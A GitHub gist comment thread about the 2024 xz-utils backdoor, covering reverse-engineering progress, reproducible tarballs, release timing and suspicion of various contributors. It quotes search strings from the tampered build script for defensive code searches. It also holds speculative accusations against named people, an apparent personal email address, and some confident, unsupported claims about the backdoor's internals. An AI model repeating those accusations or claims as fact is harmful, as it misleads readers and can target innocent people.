Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before, so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob GitHub account, not my personal one... and much of my involvement in open source stuff predates GitHub anyway.)

@AdrianBunk

Just came here to throw some links :

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted, not because it provided a weakness directly. The sideload came from an outside code base, mostly patched in. The flaw was partly that sshd is a network service that provided a way in: the listening socket.

@christoofar

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?", whether it's a FOSS discussion or at work, is themselves a red flag. Just explain why you brought the dep in, and if you get the "ugh... maybe a security concern?" reaction, then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on a compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found, seems to have gone over everyone's head.

On the RE chats/Discords: the resistance the .o puts up against observation, and the great find that endbr calls are really being used as tokens to locate the calling points, is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking about xz/lzma and distros are rebuilding packages, but zstd is still being built (or hasn't been rebuilt since 3/29) from a preconfigured GitHub tarball with lzma enabled (or is it not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the craftiest things ever to have been written. Every decompiler shop is going to be studying this for months or years. We may need to think about asking the chipset makers themselves for help. No doubt many of them have also been thinking about this, and worried about their own machines they run.

You wanted automation and less sysadmin work, you looked down on custom scripts to set up services... and here it came. If you leave honey out, the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering whether, in the dumpouts that Jia saw from Gentoo/Debian, one of the x86_64 registers was being used as a debug marker.

Force-flipping registers (though for Jia it's going to be done in an obfuscated way) is a common technique from old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere so you could inspect values by hand, as we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on, run across a bunch of projects that screamed in 5.6.0, might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins

fiorins commented Apr 5, 2024

Could GitHub add a check that the tarballs get created from the code hosted on the platform?

@AdrianBunk

Could GitHub add a check that the tarballs get created from the code hosted on the platform?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could as well have been in git like the rest of the backdoor - everything in git was also under control of the attacker.)

@rifkidocs

just want to leave a trace here

@ZacharyDK

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to the kernel or core utilities. Stability and safety are much more important than new shiny features, especially if Linux is to be the stable foundation for servers and embedded applications running critical code in the future too. I really hope people bullying maintainers into accepting patches and new features for already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

Also, the whole community needs to not succumb to the vanity of any person or group who pushes hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been, not into Linux, either in the kernel or as kernel patches included by default in major distributions or packages installed by default. The more of a "blank slate" a base Linux installation is by default, the better off everyone is. This is especially true for distributions focused on serious use, like Debian. Most people, and in turn the infrastructure they create, use major distributions as a base, so the decisions made by major distributions also have a great impact; it's not only the kernel team that must be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions, to my (limited) knowledge, don't have such a strong gatekeeper, and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also, Torvalds will eventually retire; what will happen then, who will fight against the tide? That not only makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean, over a decade ago there was a serious push to move the Linux kernel to C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community, the critical thinkers and the slow-and-steady types.

How could the OSS community at large have this reflection when it comes to critical foundations: everything needs to be handled with proper care, which means taking your time, and not every feature needs to make it in just because it's new and shiny. The problem at large is that the group who wants "feature X" added is usually loud and obnoxious and pushes hard, while most people who think "is this really necessary?" will not say anything, out of politeness, or do not care enough. Then even when maintainers have doubts, it's easy to fall for the psychological effect of "oh, this must be what people really need" and get bullied into merging a new feature without proper checks and balances. Rinse and repeat a hundred times, and suddenly the distribution has become much more bloated and harder to audit, because a hundred new features, each of which some person might just maybe need sometime, have been added as defaults.

TL;DR; Everyone who is a developer in any critical software work like kernel, core utilities, major distributions of Linux, etc., take your time. The world will not end if a new feature doesn't get added in tomorrow. It just might though if you add something in a hurry. You don't owe anyone anything, especially not someone bugging you to immediately add a "feature X" because some small subset of users might want to use it.

@Z-nonymous

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib

Aqa-Ib commented Apr 5, 2024

Well said, anzz1. You can even extrapolate what you said to everything that human society does. It is practically impossible to stop this crazy pace of development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15

Daniel15 commented Apr 5, 2024

Could GitHub add a check that the tarballs get created from the code hosted on the platform?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive for reproducible builds: the code used to build the project is exactly the same as the code checked in to source control, and building that code always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.
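On the timestamp point, here is a minimal sketch (hypothetical file contents, Python stdlib only) of the standard fix: pin mtimes, ownership, and entry order so two packing runs over the same tree are byte-identical.

```python
import io
import tarfile

def deterministic_tar(files: dict[str, bytes]) -> bytes:
    """Pack files reproducibly: sorted entry order, pinned metadata."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in sorted(files):
            data = files[name]
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = 0            # pinned timestamp: the usual reproducibility killer
            info.uid = info.gid = 0   # pinned ownership
            info.uname = info.gname = ""
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Two independent runs over the same tree produce identical bytes.
a = deterministic_tar({"src/main.c": b"int main(){return 0;}\n"})
b = deterministic_tar({"src/main.c": b"int main(){return 0;}\n"})
assert a == b
```

Tools like `git archive` apply the same idea by deriving all metadata from the commit, which is why a tag-based tarball can always be re-derived and compared.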

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.

@Daniel15

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂
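The scanning asymmetry described above is easy to quantify. A back-of-envelope sketch; the sweep time is a rough assumption taken from the masscan figure mentioned above:

```python
# Rough numbers: a masscan-class sweep covers all of public IPv4 in minutes,
# but a single routed /64 is 2**32 times larger than the whole IPv4 space.
ipv4_space = 2 ** 32
slash64_space = 2 ** 64
ipv4_scan_seconds = 10 * 60                # ~10 minutes, per the masscan figure

probes_per_second = ipv4_space / ipv4_scan_seconds
seconds_for_slash64 = slash64_space / probes_per_second
years_for_slash64 = seconds_for_slash64 / (3600 * 24 * 365)

# At IPv4-sweep rates, exhaustively scanning one /64 takes tens of
# thousands of years, which is why a random address in it is rarely found.
assert years_for_slash64 > 10_000
```

Obscurity, yes, but obscurity backed by a search space no brute-force sweep can cover.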

@ormaaj

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation to be had about how allocating four billion times the entire IPv4 address space for a single server is "a good idea" (TM), and I am old enough to remember the days when we allocated an IPv4 /8 for a single network because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation and go into other topics; the original topic is far too important.

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person, these are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that implemented a major part of the original request, this is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects make such bold accusations; it happens far too often that a brainless internet mob drives innocent people to suicide.

@thesamesam
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (I don't know him) and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious, just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour but I don't think people should be chasing after him.

@Chestnuts4

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how I can get xz-5.6.1.tar.gz, so that I can diff it the same way you did:

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4

@Chestnuts4

xz-5.6.1

Where can I download the original build-to-host.m4? I got xz-5.6.1.tar.gz from GitHub.

@thesamesam
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.
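For anyone scripting the comparison instead of eyeballing it, a small sketch: the file paths and contents below are illustrative stand-ins, with the first argument meant to point at the pristine gnulib/gettext copy and the second at `m4/build-to-host.m4` from a tarball.

```python
import difflib
from pathlib import Path

def diff_m4(pristine_path: str, suspect_path: str) -> str:
    """Unified diff of a known-good build-to-host.m4 against a tarball's copy."""
    a = Path(pristine_path).read_text().splitlines(keepends=True)
    b = Path(suspect_path).read_text().splitlines(keepends=True)
    return "".join(difflib.unified_diff(a, b, fromfile=pristine_path, tofile=suspect_path))

# Demo with stand-in files; the injected line shows up as a "+" hunk.
Path("pristine.m4").write_text("# build-to-host.m4 serial 30\n")
Path("suspect.m4").write_text("# build-to-host.m4 serial 30\ngl_am_configmake=...\n")
print(diff_m4("pristine.m4", "suspect.m4"))
```

Any non-empty output means the tarball's macro diverges from the pristine copy and deserves a closer look.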

@Chestnuts4

@thesamesam thanks for your reply, I got the original build-to-host.m4 from GitHub and successfully diffed it.

@ivq

ivq commented Apr 7, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was
acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma?
(1) Bouffalo Lab has a series of RISC-V SoCs, See Products
(2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma.
(3) The lzma BCJ filters can improve compression ratio
(4) Compression ratio matters, saved flash size is profit
(5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like
the used genromfs tool, See BLDevCube calling bundled genromfs binary
(6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.
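On point (3), for readers unfamiliar with BCJ filters: CPython's stdlib `lzma` module already exposes the existing ones through raw filter chains. `FILTER_X86` is used below as a stand-in, since `FILTER_RISCV` is precisely what the PR under discussion would add; the payload is synthetic.

```python
import lzma

# A BCJ (branch/call/jump) filter runs ahead of LZMA2 and rewrites relative
# branch targets in machine code into a canonical form, so repeated call
# sites look alike and compress better. A RISC-V filter would use the same
# API shape as FILTER_X86 here.
bcj_chain = [{"id": lzma.FILTER_X86}, {"id": lzma.FILTER_LZMA2, "preset": 6}]
plain_chain = [{"id": lzma.FILTER_LZMA2, "preset": 6}]

# Synthetic stand-in for firmware: x86 CALL opcodes (0xE8) with varying
# relative offsets, the pattern BCJ is designed to normalize.
payload = b"".join(bytes([0xE8, i & 0xFF, (i >> 8) & 0xFF, 0, 0]) for i in range(4000))

with_bcj = lzma.compress(payload, format=lzma.FORMAT_XZ, filters=bcj_chain)
without = lzma.compress(payload, format=lzma.FORMAT_XZ, filters=plain_chain)

# Round-trips must be lossless either way; the ratio gain depends on input.
assert lzma.decompress(with_bcj) == payload
assert lzma.decompress(without) == payload
```

The ratio improvement on real machine code is what makes the saved flash size worth it for OTA images.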

About the name
I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation
to non-mandarin speakers.

About the ongoing CPython PR binary test file
The reason I chose them is easy: why not use upstream test vectors if upstream has them?
However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed several changes to Wireshark in 2022 and 2023. It looks like several commits to Wireshark's Wi-Fi 802.11 handling: to meet the spec more accurately, to add a new IPv6-related capability, and to fix a bug. I'm not an 802.11 expert, but the code doesn't look unsafe at a cursory glance, for the most part.

There's some rework in this commit to address A-MSDU dissection, dealing with the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

Don't take a gust of wind for coming rain. (A Chinese idiom: don't jump to conclusions.)

@redcode

redcode commented Apr 7, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

@RufusExE

RufusExE commented Apr 8, 2024

Don't take a gust of wind for coming rain. (A Chinese idiom: don't jump to conclusions.)

I'm only looking at this from a penetration-testing angle, and every possibility has been analyzed. First: an English name would obviously make a person harder to locate and profile, and in fact the several accomplices he chose to push things forward were English-named personas, yet he picked a name that clearly matches a politically loaded and easily profiled group, and even left a tell by using a half-Pinyin, East-meets-West form in the middle of the name (this move is very odd, professional and unprofessional mixed together). Then there's the seemingly careless proxy IP hop. In terms of tradecraft, if he can disguise himself once, he can disguise himself many times; in terms of technique, his skill level should not be in dispute. I think it's best to treat this as a drill or trial run by an extremely professional individual or team.

@ivq

ivq commented Apr 8, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

No, we never talked in Chinese. There were only a few e-mails then and I did not find any useful information regarding social engineering.

@ramizpolic

This seems to me more like a team rather than individual effort.

@schkwve

schkwve commented Apr 8, 2024

I've been out of this discussion for a while; has anything interesting been said in this discussion (that has not been mentioned in the gist)?

@roccotanica1234

I don't know if it's relevant, but it appears that Hans Jansen has an account on proton.me (hansjansen162@proton.me), with the Outlook address (hansjansen162@outlook.com) set up as the recovery email.

@AdrianBunk

@thesamesam Regarding "Solar Designer suggested this may have caused", this might be disproved by 5.6.0 being released and in Debian before the MR:
https://tracker.debian.org/pkg/xz-utils
systemd/systemd#31550

The Debian Import Freeze for Ubuntu LTS on February 29 is something I would consider more likely for the timing of the 5.6.0 release:
https://discourse.ubuntu.com/t/noble-numbat-release-schedule/35649

The next chance of getting the backdoor into an Ubuntu LTS would have been 2026; releasing in February to get millions of backdoored production machines around the world by May would be a logical plan.

@thesamesam
Author

@AdrianBunk Ah, thanks! I remember being subscribed to the systemd PR before all of this and I think that meant I assumed it was older than it was, so I figured the timelines made sense. I'll make those corrections in a minute.

@thesamesam
Author

@AdrianBunk Can you check out what I've written now? There's some nuance in it. I think you're right that this makes the theory rather unlikely, although it's interesting that it was first brought up in January.

@AdrianBunk

@thesamesam Some thoughts on that:

The "a systemd developer suggested extending the approach to compression libraries" comment was 2 days after the release of 5.6.0, more relevant would be systemd/systemd#31131 (comment)

The timing of 5.6.0 is a good fit for getting into Ubuntu LTS, and that could explain the timing no matter what happened at systemd.

Lennart and Andres are both working at Microsoft, even the reverse direction that some government agency had advance knowledge of the planned backdoor and nudged people in the right direction cannot be ruled out.

@thesamesam
Author

thesamesam commented Apr 8, 2024

From my own participation in discussions on IRC, the plan was absolutely to be in the next Ubuntu LTS, btw. Jia pushed for an accelerated release schedule to make it in.

@thesamesam
Author

thesamesam commented Apr 8, 2024

@AdrianBunk Many thanks again. I'll try to find somewhere to mention the Ubuntu LTS thing, given it was absolutely true - even if I can't speak to motive. I'd prefer to mention it outside of the systemd thing given that part is getting a bit big and it's not strictly relevant to that, but I am happy to hear dissenting opinions.

@the-lne

the-lne commented Apr 9, 2024

Obviously someone would look into performance inconsistencies in an open-source tool, of all things. That's like selling a sick dog to a veterinarian. What we did is catch the lowest-hanging fruit. There are probably more out there, in even more critical tools, that we will never know about, because who doesn't have something to gain from that? This isn't news; it's writing on the wall and a warning to be a little less trustful. Imagine if he had actually known what he was doing, or what a team of sponsored professionals could do. Hopefully future commits to critical applications are held to a higher standard.

@AdrianBunk

@thesamesam Regarding "Checking other projects for similar injection mechanisms", Debian has an online search engine that provides literal and regex searches over up-to-date sources of the 38k packages in Debian unstable like:
https://codesearch.debian.net/search?q=grep+-aErls&literal=1
https://codesearch.debian.net/search?q=Automake+1.10a&literal=1

I checked interesting strings from the manipulated build-to-host.m4, and there was nothing that looked suspicious to me.
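The same sweep can be run over any local tree of unpacked tarballs. A small sketch, with the two literal markers taken from the codesearch queries above; the directory layout and file names are made up for the demo:

```python
import os

# Literal markers from the tampered build-to-host.m4 (see the codesearch
# queries above). A hit is only a reason to look closer, not proof.
SUSPECT_LITERALS = [b"grep -aErls", b"Automake 1.10a"]

def scan_tree(root: str) -> list[str]:
    """Return paths of files containing any of the suspect literal strings."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    blob = fh.read()
            except OSError:
                continue
            if any(lit in blob for lit in SUSPECT_LITERALS):
                hits.append(path)
    return sorted(hits)

# Demo against a planted sample file.
os.makedirs("unpacked/pkg/m4", exist_ok=True)
with open("unpacked/pkg/m4/sample.m4", "wb") as fh:
    fh.write(b"dnl harmless-looking macro\ngrep -aErls pattern\n")
print(scan_tree("unpacked"))
```

As with the Debian codesearch results, expect legitimate matches too; the strings only narrow the haystack.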

@felipec

felipec commented Apr 10, 2024

This one is really complete: "The xz attack shell script". It shouldn't be filed under "other".

@christoofar

christoofar commented Apr 10, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma? (1) Bouffalo Lab has a series of RISC-V SoCs, See Products (2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma. (3) The lzma BCJ filters can improve compression ratio (4) Compression ratio matters, saved flash size is profit (5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like the used genromfs tool, See BLDevCube calling bundled genromfs binary (6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation to non-mandarin speakers.

About the ongoing CPython PR binary test file The reason I chose them is easy: why not use upstream test vectors if upstream has them? However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed several changes to Wireshark in 2022 and 2023: several commits to Wireshark's Wi-Fi 802.11 handling, to meet the spec more accurately, to add a new IPv6-related capability, and to fix a bug. I'm not an 802.11 expert, but for the most part the code doesn't look unsafe at a cursory glance.
There's some rework in this commit on A-MSDU dissection, addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion, based on the current evidence of long-term lurking and preparation, it can be inferred that this individual has motives and plans, thinks clearly and cautiously, and that the information related to their background and daily routine may be distorted or manipulated. Any records left behind could potentially be intentional.

Don't take every gust of wind for the coming rain - that is, don't jump to conclusions. (Original: 不要见着风,是得雨。)

The filter-flag changes made to xz have been run down (shout-out to https://github.com/smx-smx/xzre for assembling the best reconstruction of the puzzle pieces: https://smx-smx.github.io/xzre/globals.html), letting many more people jump into disassemblers to figure out this puzzle.

Note: people keep saying (wrongly) that sshd is compromised. There's always room for improvement in anything, but sshd is not how this nasty thing gets onto a machine. It exploits systemd and ld in concert: when systemd forks a new process, the backdoor grabs hold of ld via its audit hook and reads through the rest of the load. From there it can replace any function in memory that it wants.

It's a hotloader delivery platform that can target any process in Linux. The entire memory of the computer is its oyster.

All that work you did hashing credit card data before storing it in DB2? Who cares: liblzma.so, if its creators want, can push a new variant onto your host and read it.

The data types used to support the flags are how the backdoor maintains state in memory without being seen. The RISC-V option added to lzma was done in the publicly visible code, and the refactor of lzma hides the small adjustments that let nasty structures like lzma_vdi (and other data structures in lzma) be used to hold areas of memory. It runs x64 disassembly against the entire process space, including everything systemd manages; it copies out and replaces what should have been static code marked read-only; and it hijacks ld far earlier than thought (it even hijacks itself). So all the data structures in liblzma.so can be used to hold things that are hard to construct, like function tables, while it scans both the ABI and LD_AUDIT to verify its work, pushes the results into its own reserved areas, and escapes observation.

Why don't you show us some proof, @ivq, that the changes you wanted in CPython would give you a performance boost? Did you verify that on your own testbed? How about you post your results here?

image

So, that 5.6.0 to 5.6.1 update Jia Tan put out? The RE effort exposed the loading/init pathway, where the code is trying to erase what's probably an examine tool (my theory): another hotloaded side-car they use locally to debug and keep track of the integration as they continue to layer on more techniques to thwart analysis. How do we know? Well, the crash from Valgrind came from the microlzma function.

Talking out the asm by hand, the RE team learned that it was not nuking its own stack area; it was trying to erase an adjacent one. Because liblzma.so can walk the ELF and the memory space to find the offsets for the calls it wants to use, this indicates that there's more than one build process:

  • The one we see in the distros
  • Another one baking the toxic .o injectors

A mismatch in feature flags when running the build for the injectors is why Jia had to hustle: Jia (who's really a whole team of people) did not know that Valgrind is run before some OSS developers' releases.

A full report on the top-level symbol differences between the .0 and .1 crc_64 injectors is here:
https://jiatanfunctions.tiiny.site/

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

xz @ github is available again. https://github.com/tukaani-project

@christoofar
Copy link

christoofar commented Apr 10, 2024

Right now, @ivq, I don't believe your word salad without some RISC-V proof against a direct invocation of 5.6.0 or 5.6.1.

Pull out your RISCV board and do a time test and post it here, then.

Anyway... both the encoder initter and the decoder initter got this harmless-looking adjustment which, in the decoder, is not used at all and is only meant by Lasse to report out the completed results of decompression. But with the right compile options it survives being removed. Since the filter options travel through every point in the code, guess where the pointers to the backdoor go?

The harmless-looking filter-flags update is critical to activating the backdoor; there are so many data structures to hijack inside lzma, some so handy that simple types don't even need promoting into pointers. You essentially have your own database.

Which is probably what lzma_vli will be promoted to someday in a server hotpatch; who the hell knows.

image

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

Also https://xz.tukaani.org/xz-utils/ no longer responds. (This affects a link under the 'Background' section.)

@christoofar
Copy link

christoofar commented Apr 10, 2024

Most HLL programmers are just gonna go "huh?" because they can't wrap their minds around the fact that when you leave an area of memory loaded with your porn stash, and just zero out the pointer without wiping the memory, your porn history table still sits there in RAM.

Now Jia can read it.

There's still no telling how much is left to find. I'm reliving my Compaq Deskpro 8086 days, which was the last time I wrote asm; I don't know a thing about x64 asm beyond the register sizes and effects (and some of the original x86 opcodes). There is so much more to discover.

liblzma.so is both a nightmare, and a masterpiece of layered integration. And the thing is fucking evil.

Fucking. Evil.

P.P.S.: All the credit to everyone helping out on the RE. I'm not a security huckster shilling corps with CBT videos. I have done integrations of weird shit to normal shit my whole career, pulling out and sussing through crash dumps, register readouts, logs, and any other evidence I can get my hands on when I get stuck and have to produce the normie version of events, so that developers who have no control over their side of the fence have solid ammo to fire back when the other side tries to throw shit over the wall. "They broke our shit" is what gets me going.

When I'm coming for you with a diff report, run.

@christoofar
Copy link

christoofar commented Apr 10, 2024

Oh, cool bin trick from fiddling with game roms:

Compress a bin (gz will do in many cases; not all, but most). You can spot where data goes and where code goes, because compression strips away all the 00/FF patterns left around by initializers. It only works for empties, but in corpland, and especially in C++, there are monster data structures that compress down to almost nothing.

In Jia Tan's case, the function deletion reorders everything that survived, resulting in a byte slide that shows up well on the radar.
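That zero-stripping effect is easy to reproduce with standard tools. A rough sketch, assuming nothing about the xz payload itself (the file names and the 1 MiB size are arbitrary):

```shell
# Data regions full of 0x00 initializer padding compress to almost nothing;
# dense code-like (here: random) bytes barely compress at all.
tmp=$(mktemp -d)
head -c 1048576 /dev/zero    > "$tmp/zeros.bin"   # stand-in for zeroed data regions
head -c 1048576 /dev/urandom > "$tmp/noise.bin"   # stand-in for dense code
gzip -k "$tmp/zeros.bin" "$tmp/noise.bin"
wc -c "$tmp/zeros.bin.gz" "$tmp/noise.bin.gz"     # zeros: ~1 KiB; noise: ~1 MiB
rm -rf "$tmp"
```

Comparing the compressed sizes of two builds of the same binary gives exactly the cheap "how big was the real change" signal described above.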

You already have a bindiff analyzer on your box: it's in emacs (the other malware you can get from the distros). It's a neat trick when a vendor sends something and I need a clue of how "big" their changes were, generally speaking. Vendors keep 9 layers of mismanagement between me and the other team actually doing the work, and this lets me sense when they aren't talking but the bins they're shipping indicate a refactor job on the inside.

Jia again:
image

@terokinnunen
Copy link

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get it from gnulib. It might be in /usr/share/aclocal on your system if you have a recent gettext installed too.

Thanks, I was puzzled about this too for quite a while. Just an idea: a pointer to the legit upstream https://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=blob;f=m4/build-to-host.m4;h=f466bdbd84abdf60e8305fa7adc12c74d7f05a8a;hb=HEAD would be a helpful clarification here.
(Probably the TODO item "Explain dist tarballs" will cover this later(?), but until then a quick pointer in the Design section would clarify a lot.)

@christoofar
Copy link

christoofar commented Apr 10, 2024

